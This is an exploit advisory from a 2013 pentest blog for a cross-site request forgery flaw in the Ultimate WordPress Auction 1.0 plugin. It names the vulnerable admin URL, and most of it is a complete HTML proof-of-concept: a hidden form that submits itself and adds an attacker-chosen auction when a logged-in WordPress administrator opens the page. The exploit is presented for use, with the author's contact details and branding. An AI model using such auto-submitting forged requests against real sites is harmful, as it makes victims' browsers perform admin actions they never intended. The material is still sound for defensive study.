=============================================================
        __   __          _    ___    _   __   ____        
        \ \ / /         | |  / _ \  (_) /_ | |___ \       
   ___   \ V /   _ __   | | | | | |  _   | |   __) |  _ __
  / _ \   > <   | '_ \  | | | | | | | |  | |  |__ <  | '__|
 |  __/  / . \  | |_) | | | | |_| | | |  | |  ___) | | |  
  \___| /_/ \_\ | .__/  |_|  \___/  |_|  |_| |____/  |_|  
                | |                                       
                |_|              blackpentesters.blogspot.com
=============================================================
 
##############################################################################
# Exploit Title: [ Ultimate WordPress Auction v1.0 Plugin CSRF Vulnerability ]
# Date: [2013-6-15]                                          
# Exploit Author: [expl0i13r]                                        
# Vendor Homepage: [http://wordpress.org/plugins/ultimate-auction/]                  
# Software Link: [http://downloads.wordpress.org/plugin/ultimate-auction.zip]            
# Version: [1.0]                                                                   
# Tested on: [Wordpress 3.5.1 (Windows)]                         
# Contact: expl0i13r@gmail.com                                       
##############################################################################
 
 
1. Plugin Description:
========================
 
The Ultimate WordPress Auction plugin allows easy and quick way to set up a professional auction website in ebay style.
 
2. Vulnerability Description:
==============================
 
This wordpress plugin "Ultimate WordPress Auction 1.0" suffers from CSRF vulnerability which can be successfully exploited by attacker to add Fake Auction Bids.
 
 
Affected URL:
--------------
 
http://127.0.0.1/wordpress-3.5.1/wordpress/wp-admin/admin.php?page=add-new-auction
 
 
eXpl0it code:
--------------
 
<html>
<head>
<script type="text/javascript" language="javascript">
function submitform()
{
    document.getElementById('myForm').submit();
}
</script>
</head>
<body>
 
<form name="myForm" id="wdm-add-auction-form" class="auction_settings_section_style" action="http://127.0.0.1/wordpress-3.5.1/wordpress/wp-admin/admin.php?page=add-new-auction" method="POST" novalidate="novalidate">
 
Link: http://blackpentesters.blogspot.in/
Title:
<input name="auction_title" type="text" id="auction_title" class="regular-text valid" value="expl0iter">
Description:     
<textarea name="auction_description" type="text" id="auction_description" cols="50" rows="10" class="large-text code valid">&lt;/textarea&gt;
<input name="opening_bid" type="text" id="opening_bid" class="small-text number" min="0" value="">
<input name="lowest_bid" type="text" id="lowest_bid" class="small-text number" min="0" value="">
<input name="incremental_value" type="text" id="incremental_value" class="small-text number" min="0" value="">
<input name="end_date" type="text" id="end_date" class="regular-text hasDatepicker" readonly="" value="2013-07-10 00:00:00">
<input name="buy_it_now_price" type="text" id="buy_it_now_price" class="small-text number" min="1" value="">
<input type="submit" name="submit" id="submit" class="button button-primary" value="Save Changes">
 
</form>
 
<script type="text/javascript" language="javascript">
document.myForm.submit()
</script>
</body>
</html>
 
Once victim clicks on this link new auction of attackers choice will be added.(provided victim logged in to wordpress)
 
 
##################################
#           eXpl0i13r            #
# ------------------------------ #
#|blackpentesters.blogspot.com  |#
#|infotech-knowledge.blogspot.in|#
# ------------------------------ #
##################################